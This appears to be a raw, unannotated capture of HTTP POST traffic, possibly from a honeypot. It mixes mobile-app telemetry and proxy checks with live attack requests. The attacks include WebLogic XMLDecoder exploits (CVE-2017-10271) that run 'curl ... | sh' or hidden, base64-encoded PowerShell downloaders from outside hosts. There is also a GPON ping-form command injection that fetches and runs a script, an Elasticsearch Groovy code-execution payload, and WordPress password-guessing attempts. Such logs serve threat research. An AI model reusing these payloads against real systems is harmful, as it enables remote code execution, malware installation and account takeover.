Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂”âÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å£˚ 2Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îö"Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
EK0LlI/NYp/y/uug/i2cexMcryXDolsPyinQihrZZuRHKE0PWB1qkcRi1uvZZnTjiT90f3PdXNWosNLU7BlnJiGQiOkOGUZIfQ101CIbDYkqkEZ2FJ5qqGaXWJKsVPhpSogBviUEG90TmV7/IfgZiVkF/ozEXO9c5JbcQBrFZZqyLLVcTmAbx/1a/lFgTq51OC/ayxmVDF1M64jiewe7wBL3JvOLtV0fkfIviVAJC184NXXpkcDoBxMMYOysnUiBEVA/m8x8uXeEmBOnm07N/onrvNZF1DmuRXS0K+ENIWFcDDuMSBhHapwh1BZXVDEKee5Fk9ZmNl0mYiE/YOVmW25PyLe8Go0p+O8I0FiWqUWxA+jxTGc4H9s/ocH+AHyv44JYXrQjqUWQV/beyTOX8orAw/kn8zBcm4q+B9H2NN4Su5NOzrbG
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å‘ˆ˝}Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îéΩY›∆√«∆fl
POST http://f2.doodlemobile.com/feature_server/geo-ip/test.php HTTP/1.1
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Host: f2.doodlemobile.com
Connection: Keep-Alive
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 574
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://83.171.104.73:4444/cve-2017-10271?target=http%3A%2F%2F45.62.210.15%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=admin&pwd=172qw
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 558
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue3
POST http://ucus.ucweb.com/usquery.php HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.4; id; MI_4LTE) U2/1.0.0 UCBrowser/10.9.0.946 U2/1.0.0 Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 415
Host: ucus.ucweb.com
Connection: Keep-Alive
POST http://puds.ucweb.com/upgrade/index.xhtml?dataver=pb HTTP/1.1
Content-Length: 640
Host: puds.ucweb.com
Connection: Keep-Alive
POST http://check.proxyradar.com/azenv.php?auth=149520137641&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÀ6ªÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î_4Y›∆√«∆fl
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
QKxck4nKNjPGGVER9t66ba7wMHTBvjchFvs+C8q8tKmt9EbDGzJIjGHzRL6oEDPbij+HvXm3uQcv9peUFVy5U+8JBHh478p++BbZ8jXCfNWVX1nsmlyO9olBnv9p4y968a4lN421rGBeI6OPVHKSLS0jAIFWCpF96SP1QLniQMhqOQQOBmIL4rEInp/9C16WBlfWmgxR7P/T2R6V1wCjc5nveJse5dXajQwup6W5e3BpVOzn0wTutNdSA0EBs80PAd68Des8TqGR0sZT22rlQm8vPdOl6B3DJYoU+df0YbNUYa/fgybETKNLisg0JnfTGf4JkC7LumDb0ar97laF2bOIAAxbpvothU1Zi4XfyrelcxCQNsKGwhFRFs7rjK32yz2a
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
301660
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
5f0effa44094e54dcb125f56bea05a5c
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--pM5x9eKo_iTf0R0Ad2T8lpcdA1EG6bZmw7--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1051
Content-Type: multipart/form-data; boundary=0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
985274
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
687b3b20b8cc9188e750dadcc9bef07c
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--0c2khjiHOs8R5qGn_Ols5LkLr_uQA2soKNM--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149303573355&a=PSCMN&i=2335908067&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=admin&pwd=jamesatchue333
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache
log=admin&pwd=jamesatchue1234567
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=admin77
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
EaIPk9mdN6w65NSgPqe7G7tI4Js6A/KJ8BPQr/aYb605ZUxngus+ubRMActfqprqW6I+LcKXNJNQ8/0VAPUkdI2TtqTdrCnyJYxCgiwdjrnluvb3p7qX1MnEgDLWFA5ZO0jmDvjO23huLU2NegAWySjxxRnK+scD2k2Fe9TWLuLKatMwL48bqLZP0O0NV9ksFuTAppyWofizZ3blW5D5kVTKClfrhFS9wG7ZfVP9fq7BGitCA0JMdqQp1KQ76Z+apZxCCcUI34ib6N44qjxZ44V+uSDmBG85Q0S5v6Rt4d61+LHwghXA+Vht30TH3KnHGF7niIu1pwJuKm80faEhoEzXfIJwLuRIZN1Id5f3c7HJ76DkwvDTCF5J/A3J3KhOgz0ceHMkzDzhRbQr/2mPQ3UqsTU=
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
